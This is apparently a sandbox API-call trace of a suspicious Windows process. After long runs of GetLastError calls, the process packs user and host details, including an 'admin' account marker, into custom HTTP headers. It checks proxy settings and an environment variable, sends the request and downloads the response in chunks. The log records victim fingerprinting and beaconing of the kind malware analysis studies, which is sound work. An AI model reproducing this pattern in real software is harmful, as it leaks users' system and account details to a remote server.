	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.280] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.281] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.282] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] GetLastError () returned 0x0
	[0074.283] wsprintfW (in: param_1=0x31a40a0, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0074.308] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0074.308] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0074.308] NetApiBufferFree (Buffer=0x5a3f38) returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.308] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.309] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x247f22c, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0074.310] wsprintfW (in: param_1=0x31a40a0, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0074.310] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0074.310] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.310] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] GetLastError () returned 0x0
	[0074.311] lstrlenW (lpString="X-HTTP-Agent: WININET") returned 21
	[0074.311] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] GetLastError () returned 0x0
	[0074.312] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0074.312] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0074.312] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0074.312] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x247f34c | out: phkResult=0x247f34c*=0x688) returned 0x0
	[0074.313] RegQueryValueExW (in: hKey=0x688, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x247f350*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x247f350*=0x0) returned 0x2
	[0074.313] RegCloseKey (hKey=0x688) returned 0x0
	[0074.313] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0074.313] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x247fba0, lpdwBufferLength=0x247fb80 | out: lpBuffer=0x247fba0, lpdwBufferLength=0x247fb80) returned 1
	[0074.313] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x247fba0, dwBufferLength=0x4) returned 1
	[0074.313] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1
	[0074.511] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x247fba8, lpdwBufferLength=0x247fbac, lpdwIndex=0x0 | out: lpBuffer=0x247fba8*, lpdwBufferLength=0x247fbac*=0x4, lpdwIndex=0x0) returned 1
	[0074.511] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x247fcf8, lpdwBufferLength=0x247fbac, lpdwIndex=0x0 | out: lpBuffer=0x247fcf8*, lpdwBufferLength=0x247fbac*=0x4, lpdwIndex=0x0) returned 1
	[0074.518] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
